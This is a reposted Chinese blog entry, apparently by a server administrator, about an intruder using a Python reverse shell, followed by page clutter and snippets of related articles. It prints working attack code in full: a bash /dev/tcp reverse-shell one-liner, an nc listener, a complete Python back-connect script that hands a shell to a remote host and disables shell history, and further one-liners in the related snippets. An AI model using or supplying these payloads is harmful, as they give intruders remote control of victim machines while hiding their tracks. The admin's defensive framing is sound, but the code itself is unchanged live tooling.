以Python写的 反弹工具

最新推荐文章于 2024-05-14 04:44:11 发布
最新推荐文章于 2024-05-14 04:44:11 发布
阅读量242 收藏
点赞数
文章标签: python shell 操作系统
原文链接:http://www.cnblogs.com/huidou/p/10761491.html
版权

python 反弹shell

 

我们知道,一般的反弹shell   

可以直接使用   base 反弹

bash -i >& /dev/tcp/ownip/port 0>&1

还可以使用一些简单的命令   nc  nmap 等等。。。。

nc -l -p port -vv xxx

 

经过前几次的攻击,他也变聪明了,知道我针对了php 的文件加强了管控,

所以它又有针对性的使用了Linux自带的Python  进行基于Python的反弹

 

源码:

# -*- coding:utf-8 -*-
#!/usr/bin/env python
"""
back connect py version,only linux have pty module
code by google security team
"""
import sys,os,socket,pty
shell = "/bin/sh"

def usage(name):
    print 'python reverse connector'
    print 'usage: %s <ip_addr> <port>' % name

def main():
    if len(sys.argv) !=3:
        usage(sys.argv[0])
        sys.exit()
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
        s.connect((sys.argv[1],int(sys.argv[2])))
        print 'connect ok'
    except:
        print 'connect faild'
        sys.exit()
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    global shell
    os.unsetenv("HISTFILE")
    os.unsetenv("HISTFILESIZE")
    os.unsetenv("HISTSIZE")
    os.unsetenv("HISTORY")
    os.unsetenv("HISTSAVE")
    os.unsetenv("HISTZONE")
    os.unsetenv("HISTLOG")
    os.unsetenv("HISTCMD")
    os.putenv("HISTFILE",'/dev/null')
    os.putenv("HISTSIZE",'0')
    os.putenv("HISTFILESIZE",'0')
    pty.spawn(shell)
    s.close()

if __name__ == '__main__':
    main()

 

很恶心啊 ,可以看到通过os函数,针对环境变量无限向我服务器上传参

我查询资料 还发现  即使你禁所有端口,只开放80 端口,也还能通过Python绕过去TCP。从UDP上去。恶心至极啊!!!

谢邀大神

友情链接:

https://www.cnblogs.com/mujj/articles/3272401.html 

转载于:https://www.cnblogs.com/huidou/p/10761491.html

diaoqin7781
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
30个python小游戏
07-25
以上只是一些示例,实际上可以通过使用Python的图形库(如pygame、turtle等)以及其他辅助库和工具,进行更复杂的游戏开发。可以添加音效、关卡设置、计分系统等元素,增加游戏的乐趣和挑战性。 此外,还可以利用...
python封印魔法球小游戏
09-10
在这个以"Python封印魔法球"为标题的小游戏中,开发者利用了Python编程语言和Pygame Zero库来构建一个趣味性的互动体验。Pygame Zero是一个简化版的Pygame库,旨在让初学者更容易地创建2D游戏。这个游戏的核心概念是...
各种shell反弹方法
weixin_46626737的博客
05-16 2593
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell。
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 5425
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
各种shell反弹方法_python反弹shell脚本
最新发布
2401_84972726的博客
05-14 764
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
python反弹shell
weixin_42576467的博客
01-07 676
你是想问 Python 如何实现反弹 shell 吗? 反弹 shell 是一种通过远程连接获取受害者计算机的 shell 权限的攻击技术。 使用 Python 反弹 shell 的方法如下: 首先,在本地计算机上运行一个监听程序,等待连接。 然后,在受害者计算机上运行一个 Python 脚本,该脚本将连接到本地计算机的监听程序。 当连接建立后,就可以通过本地计算机上的 shell 命令控制...
python教程:正常shell与反弹shell(1),2024年最新2024蚂蚁金服面试题及答案
m0_60635224的博客
04-15 259
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照下面的知识点去找对应的学习资源,保证自己学得较为全面。#例:攻击端(win10),被攻击端(win7),正常shell,先在win7启动服务端,再在win10启用客户端。os.chdir(command[2:].strip()) #切换路径。
python简单的反向木马
YeD666的博客
04-01 4129
python反向木马 命令执行是通过 subprocess 模块实现、window下可以正常执行不会出现乱码 被控端代码: import socket import subprocess import time def run_command(command): # 命令执行函数 command = command.rstrip() # 返回删除 string 字符串末尾的指定字符后生成的新字符串 默认为空格 try: # stdout=subprocess.PIPE,st
python100行代码一个弹球游戏
04-20
总之,Python的pgzero库为开发PONG这样的弹球游戏提供了高效、易学的工具。通过100行代码实现这个游戏,你不仅能够体验到编程的乐趣,还能加深对Python游戏开发的理解。在这个过程中,你可能会遇到各种挑战,但解决...
python接小球游戏.rar
04-05
Python的pygame库是一个非常强大的工具,它为开发者提供了创建2D游戏的能力。在这个"python接小球游戏"中,我们看到pygame被用来实现一个挡板接小球的游戏,具有可选择难度、挡板随时间变短以及小球速度逐渐加快等...
小球反弹python源码.py
05-26
小球反弹是pygame入门者最爱好制作的作品之一,我刚刚入门pygame的时候,就做了这个小球反弹和飞机大战
使用python反弹shell
noner_n的博客
05-05 2948
python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" 使用python进行反弹shell,IP改成攻击机ip,端口随意,没有
反弹shell的N种姿势
热门推荐
记录并分享学习安全的知识点..
09-13 1万+
在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。
反弹shell的实现方式和检测方法
12-25 4350
我所理解的反弹shell,是外部人员通过web或者软件的漏洞,建立了一个数据流通向网络外部的shell执行环境。 现在针对一些网络上反弹shell实例作说明:   反弹shell 现在针对一些网络上反弹shell实例作说明: 实例1,Bash反弹: Bash反弹,远程主机监听端口: nc -lvp 7777 被入侵的机器反弹shell命令如下: bash -i &gt;&am...
Python解决小球反弹问题
weixin_43599240的博客
05-07 8401
一球从100米高度自由落体 每次反弹原来的一半;第10次落地一共经过多少米,第十次反弹多少米? num = 100 b = list() for i in range(10): num = num / 2 b.append(num) print("小球一共移动了%s米" % (100+sum(b))) print("第十次小球弹了%s米" % b[9]) 结果: 小球一共移动了19...
反弹的小球(python
weiwei1994的专栏
01-10 5176
一个适合Python初学者体验的简单小游戏程序
Python3实现——反弹shell
weixin_34417814的博客
12-14 1059
一、演示一下反弹shell的效果0、看一下python版本1、我们这边是服务端客户端连接后就可以输入命令了,比如下面截图中输入的pwd2、目标机是客户端,输入ip和端口二、代码+注释0、服务端1、客户端 转载于:https://blog.51cto.com/l4ser/1882841...
Python反弹球精简版
so_so_y的博客
01-23 1714
说明:在游戏界面点击鼠标左键开始游戏,小球的移动速度每次游戏均为随机获得,键盘左右键控制木板的移动,每接到一次小球score+2,小球落地游戏结束 from tkinter import * import time import random #创建小球 class Ball: def __init__(self,canvas,paddle,color): self.c
Python精灵模块sprites:制作动画与游戏的工具
Python编程领域,"精灵模块"(sprites模块)是一种专门用于制作动画和游戏的工具,尤其适合初学者和儿童编程教育。它基于Python的turtle模块,为turtle添加了更多功能,如碰撞检测、图形旋转等,使得创作动态效果...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值